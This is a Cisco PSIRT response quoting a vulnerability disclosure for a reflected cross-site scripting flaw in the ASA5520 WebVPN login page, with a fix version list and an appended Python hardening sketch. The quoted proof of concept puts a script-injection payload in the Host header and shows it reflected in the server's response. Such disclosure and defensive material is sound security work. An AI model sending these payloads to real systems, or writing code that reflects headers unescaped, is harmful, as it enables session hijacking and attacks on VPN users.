RE: Cisco ASA5520 Web VPN Host Header XSS
This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco PSIRT greatly appreciates the opportunity to work with researchers
on security vulnerabilities, and welcomes the opportunity to review and
assist in product reports. PSIRT would like to thank Bugs NotHugs for
reporting this issue to us.
Cisco has released an IntelliShield Alert on this vulnerability, which is
available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950. This
and other IntelliShield Alerts are available off the Cisco Security
Center (www.cisco.com/security).
Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093 and the fixes will be available in 8.0.3.31, 8.1.2.22, and
8.2.0. These images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim.
To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit:
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs
-----Original Message-----
From: Bugs NotHugs [mailto:bugsnothugs@xxxxxxxxx]
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS
- Cisco ASA5520 Web VPN Host Header XSS
- Description
Cross-site scripting.
- Product
Cisco, ASA5520, IOS 7.2(2)22
- PoC
Modified request:
POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556
<html>
<!--
Copyright (c) 2004, 2005 by Cisco Systems, Inc.
All rights reserved.
-->
<head>
<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North
America Server" for
"http://"'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>
<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>
- Solution
None
- Timeline
2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)
--
BugsNotHugs
Shared Vulnerability Disclosure Account
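
Added example (not part of either message above, and not Cisco's fix): a Python sketch of the two server-side controls that address the reflection shown in the quoted response, namely rejecting a malformed Host header and HTML-encoding whatever value is written into the attribute. The template is a constructed stand-in for the portal's PICS-Label tag, and the function names and the canonical name vpn.example.com are assumptions.

```python
import html
import re

# Host header value exactly as sent in the PoC request quoted above.
PAGE_HOST = '''"'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org'''

# Simplified host syntax: DNS name or IPv4 literal, or bracketed IPv6, optional port.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"(?:{_LABEL}(?:\.{_LABEL})*|\[[0-9A-Fa-f:.]+\])(?::[0-9]{{1,5}})?")

# Constructed stand-in for the portal's PICS-Label tag (single-quoted attribute).
TEMPLATE = ("<META http-equiv=\"PICS-Label\" content='(PICS-1.1 "
            "\"http://www.rsac.org/ratingsv01.html\" l gen true for "
            "\"http://{host}/+webvpn+/index.html\")'>")


def is_valid_host(value: str) -> bool:
    """True only for a syntactically plausible Host header value."""
    return len(value) <= 255 and _HOST_RE.fullmatch(value) is not None


def attr_escape(value: str) -> str:
    """Encode &, <, > and both quote characters for use inside an HTML attribute."""
    return html.escape(value, quote=True)


def render_reflecting(host: str) -> str:
    """Behaviour shown in the quoted response: the header is copied in verbatim."""
    return TEMPLATE.format(host=host)


def render_hardened(host: str, canonical: str) -> str:
    """Use the configured name unless the header is well-formed, then encode it anyway."""
    chosen = host if is_valid_host(host) else canonical
    return TEMPLATE.format(host=attr_escape(chosen))


if __name__ == "__main__":
    print(render_reflecting(PAGE_HOST))
    print(render_hardened(PAGE_HOST, "vpn.example.com"))
    print(attr_escape(PAGE_HOST))
```

The syntax check only rejects malformed values; a deployment that knows its own hostnames can compare against that list instead of accepting any well-formed name.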